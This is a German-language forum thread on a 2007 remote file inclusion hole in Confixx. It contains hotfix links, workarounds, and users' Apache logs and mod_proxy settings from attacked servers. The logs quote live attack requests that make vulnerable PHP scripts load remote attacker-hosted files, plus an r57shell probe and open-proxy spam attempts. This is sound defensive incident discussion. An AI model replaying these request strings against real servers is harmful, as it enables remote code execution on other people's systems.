Sicherheitslücke in Confixx <=3.3.1

[Roger Wilco]

Und wieder einmal eine ausnutzbare Lücke in Confixx:

Confixx <= PRO 3.3.1 Remote File Inclusion Vulnerability

Der Fehler ermöglicht es Angreifern, auf dem Server beliebige Dateien einzubinden. Sofern PHP nicht entsprechend konfiguriert ist, können auch entfernte Dateien eingebunden werden. Die Kommandos werden im Kontext des Benutzers, unter dem die Confixx-Skripte laufen, ausgeführt.

Update:
Meldung auf dem Heise Newsticker: http://www.heise.de/newsticker/meldung/93627
Hotfix von SWSoft:
http://download1.swsoft.com/Confixx/sec ... _notes.txt
http://download1.swsoft.com/Confixx/sec ... tfix.pl.gz

[antondollmaier]

ACHTUNG

Die ersten Exploits / Bots dafür sind bereits unterwegs!

Code: Select all

195.35.82.155 - - [24/Jul/2007:17:12:37 +0200] "GET /category/confixx/admin/business_inc/saveserver.php?thisdir=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 200 14431 "-" "libwww-perl/5.805" 
195.35.82.155 - - [24/Jul/2007:17:12:38 +0200] "GET /admin/business_inc/saveserver.php?thisdir=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 200 14431 "-" "libwww-perl/5.805"
195.35.82.155 - - [24/Jul/2007:17:12:38 +0200] "GET /category/admin/business_inc/saveserver.php?thisdir=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 200 14431 "-" "libwww-perl/5.805"
195.35.82.155 - - [24/Jul/2007:17:13:18 +0200] "GET /2007/01/26/confixx-aktiviert/admin/business_inc/saveserver.php?thisdir=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 200 14431 "-" "libwww-perl/5.805"
195.35.82.155 - - [24/Jul/2007:17:13:18 +0200] "GET /2007/01/26/admin/business_inc/saveserver.php?thisdir=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 200 14431 "-" "libwww-perl/5.805"

(auszugsweise, waren noch mehr IPs)


Die Treffer gingen hier auf ein Wordpress - scheint wohl, als ob wer via Google nach Confixx-Installationen sucht und die dann checken lässt ...

[oxygen]

Confixx stellt für den eigenen vhost standardmäßig ein:

allow_url_fopen off
open_basedir /var/www/confixx

Die Gefahr ist damit eher gering.

Edit Workaround: einfach Zugriff auf admin/business_inc/ verhindern, z.B. per .htaccess mit deny from all.

[silent85]

Genau das gleiche hatte ich, allerdings nicht auf die Saverserver vom Confixx sondern auf eine Phpkit HP.

Nun habe ich denn FIx Installiert

Code: Select all

./confixx_hotfix.pl
This is a security hotfix for vulnerability in admin/business_inc/saveserver.php
Should be applied to Confixx versions since 2.0.12 up to 3.3.1
It also should be applied every time you make upgrade to one of vulnerable versions
<press any key to continue or CTRL+C to cancel>

Nachdem die Leertaste nicht ging (Where is the Any Key??) bekam ich mit ENTER folgende ausgabe:

Code: Select all

Done.

Heisst das jetzt es ist erforgreich gefixt?


Und warum verdammt nochmal hab ich kein Any Key?? muss ich mir doch ne 102/103 tasten Tastatur bauen?? :roll:

[Roger Wilco]

Heisst das jetzt es ist erforgreich gefixt?

Schau doch einfach mal in den Hotfix, was dieser eigentlich macht. ;)

[silent85]

Ups... Ja mein English ist nicht das beste. DOne heisst so viel "getan" laut Übersetzungstool. Dachte das heist so viel wie beenden oder beendet.

Hab mir das Script nun mal vom inhalt angeschaut und am ende sagt der immer Done. :oops:

Da hab ich wieder was gelernt... vor dem Posten einfach mal schauen mansche sachen verstehen sich von selbst.. Sry und danke für die Hilfe zur Selbsthilfe . :-)

Hey aber vieleicht hat jemand die gleiche Frage und ist so ein Noob wie ich 8O :roll: :-D

[kochloeffel]

Ich hätte dazu noch eine Frage. Hab ein betroffenes Confixx hier und jetzt den Hotfix installiert. Allerdings stehen bereits folgende Dinge in meinem Logfile:

127.0.0.1 :: 127.0.0.1 - - [05/Dec/2007:19:11:36 +0100] "GET /?option=com_performs&formid=2&Itemid=40/components/com_performs/performs.php%3fmosConfig_absolute_path=http://www.wsteam.net/include.c%3f HTTP/1.1" 404 1022 "-" "libwww-perl/5.803"
127.0.0.1 :: 127.0.0.1 - - [05/Dec/2007:19:16:06 +0100] "GET /?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://crowdot.5gbfree.com/.ssh/id.txt%3f%3f HTTP/1.1" 404 1022 "-" "libwww-perl/5.803"
127.0.0.1 :: 127.0.0.1 - - [05/Dec/2007:19:16:08 +0100] "GET /?option=com_performs&formid=2/components/com_performs/performs.php%3fmosConfig_absolute_path=http://www.wsteam.net/include.c%3f HTTP/1.1" 404 1022 "-" "libwww-perl/5.803"
127.0.0.1 :: 127.0.0.1 - - [05/Dec/2007:19:16:56 +0100] "GET /?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://crowdot.5gbfree.com/.ssh/id.txt%3f%3f HTTP/1.1" 404 1022 "-" "libwww-perl/5.803"
kochloeffel.voellig-umsonst.net :: 82.149.177.62 - - [05/Dec/2007:19:20:13 +0100] "GET /media/468x60-2.gif HTTP/1.1" 404 1077 "http://www.linkhitlist.com/cgi/LHL_D.ex ... 9956817164" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
127.0.0.1 :: 127.0.0.1 - - [05/Dec/2007:19:20:54 +0100] "GET / HTTP/1.1" 404 1022 "-" "libwww-perl/5.803"
80.86.82.17 :: 213.215.41.138 - - [05/Dec/2007:19:23:41 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 226 "-" "-"
127.0.0.1 :: 127.0.0.1 - - [05/Dec/2007:19:25:25 +0100] "GET /?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://crowdot.5gbfree.com/.ssh/id.txt%3f%3f HTTP/1.1" 404 1022 "-" "libwww-perl/5.803"
127.0.0.1 :: 127.0.0.1 - - [05/Dec/2007:19:31:32 +0100] "GET /479/index.php?sida=http://www.wsteam.net/include.c%3f HTTP/1.1" 404 1022 "-" "libwww-perl/5.803"
127.0.0.1 :: 127.0.0.1 - - [05/Dec/2007:19:56:02 +0100] "GET /?phpbb_root_path=http://crowdot.5gbfree.com/.ssh/id.txt%3f%3f HTTP/1.1" 404 1022 "-" "libwww-perl/5.803"
127.0.0.1 :: 127.0.0.1 - - [05/Dec/2007:19:56:02 +0100] "GET /?phpbb_root_path=http://crowdot.5gbfree.com/.ssh/id.txt%3f%3f HTTP/1.1" 404 1022 "-" "libwww-perl/5.803"
127.0.0.1 :: 127.0.0.1 - - [05/Dec/2007:19:57:38 +0100] "GET /?phpbb_root_path=http://crowdot.5gbfree.com/.ssh/id.txt%3f%3f HTTP/1.1" 404 1022 "-" "libwww-perl/5.803"
127.0.0.1 :: 127.0.0.1 - - [05/Dec/2007:20:01:24 +0100] "GET /?phpbb_root_path=http://crowdot.5gbfree.com/.ssh/id.txt%3f%3f HTTP/1.1" 404 1022 "-" "libwww-perl/5.803"
127.0.0.1 :: 127.0.0.1 - - [05/Dec/2007:20:01:43 +0100] "GET /?t=5280&highlight=safe+mode/language/lang_english/lang_main_album.php%3fphpbb_root_path=http://crowdot.5gbfree.com/.ssh/id.txt%3f%3f HTTP/1.1" 404 1022 "-" "libwww-perl/5.803"
127.0.0.1 :: 127.0.0.1 - - [05/Dec/2007:20:28:56 +0100] "GET /?spaw_root=http://usuarios.arnet.com.ar/larry123/safe.txt%3f HTTP/1.1" 404 1022 "-" "libwww-perl/5.803"
127.0.0.1 :: 127.0.0.1 - - [05/Dec/2007:20:28:56 +0100] "GET /?spaw_root=http://usuarios.arnet.com.ar/larry123/safe.txt%3f HTTP/1.1" 404 1022 "-" "libwww-perl/5.803"
65.54.201.60 :: 65.54.241.68 - - [05/Dec/2007:20:47:21 +0100] "POST http://65.54.201.60:25/ HTTP/1.0" 200 1046 "-" "-"
65.54.201.60 :: 65.54.241.68 - - [05/Dec/2007:20:47:21 +0100] "CONNECT 65.54.201.60:25 HTTP/1.0" 200 1046 "-" "-"
65.54.201.60 :: 65.54.241.68 - - [05/Dec/2007:20:47:23 +0100] "POST http://65.54.201.60:25/ HTTP/1.0" 200 1046 "-" "-"
65.54.201.60 :: 65.54.241.68 - - [05/Dec/2007:20:47:23 +0100] "CONNECT 65.54.201.60:25 HTTP/1.0" 200 1046 "-" "-"
65.54.201.60 :: 65.54.241.68 - - [05/Dec/2007:20:47:24 +0100] "CONNECT 65.54.201.60:25 HTTP/1.0" 200 1046 "-" "-"
65.54.201.60 :: 65.54.241.68 - - [05/Dec/2007:20:47:24 +0100] "POST http://65.54.201.60:25/ HTTP/1.0" 200 1046 "-" "-"
127.0.0.1 :: 127.0.0.1 - - [05/Dec/2007:21:02:02 +0100] "GET /r57shell/version.php?version=13 HTTP/1.0" 404 1022 "-" "-"

und außerdem hatte ich 100GB Traffic in 2 Tagen, sonst hab ich ca. 12 - 17 GB im Monat. In den letzten beiden Tagen war der Traffic aber wieder normal. Es muss da schon irgendwas passiert sein. Ist die Sache jetzt mit der Installation des Hotfix ausgestanden oder sind weitere Maßnahmen nötig. Was empfehlt ihr?

Grüße Christian

[Joe User]

Die 404er und 400er sind harmlos, Sorgen sollten Dir die 200er mahen, denn diese zeigen, dass durch Dein fehlkonfiguriertes mod_proxy Spam verschickt werden kann.

[kochloeffel]

So sieht meine mod_proxy Konfiguration jetzt aus:

Code: Select all

<IfModule mod_proxy.c>

        #turning ProxyRequests on and allowing proxying from all may allow 
        #spammers to use your proxy to send email.
                
	ProxyRequests Off

	<Proxy *>
		Order deny,allow
		Deny from all
		#Allow from .your_domain.com
	</Proxy>

	# Enable/disable the handling of HTTP/1.1 "Via:" headers.
	# ("Full" adds the server version; "Block" removes all outgoing Via: headers)
	# Set to one of: Off | On | Full | Block
	
	ProxyVia Off

	# To enable the cache as well, edit and uncomment the following lines:
	# (no cacheing without CacheRoot)
	
	CacheRoot "/var/cache/apache2/proxy"
	CacheSize 5
	CacheGcInterval 4
	CacheMaxExpire 24
	CacheLastModifiedFactor 0.1
	CacheDefaultExpire 1
	# Again, you probably should change this.
	#NoCache a_domain.com another_domain.edu joes.garage_sale.com

</IfModule>

ProxyVia stand vorhin noch auf On. Hatte die Standardeinstellung so übernommen.

Grüße Christian

[Roger Wilco]

Warum lädst du überhaupt mod_proxy, wenn du es nicht benötigst?

[kochloeffel]

Das war die Standardinstallation dieses webperoni Servers. Bin gar nicht auf die Idee gekommen da nachzusehen.

Grüße Christian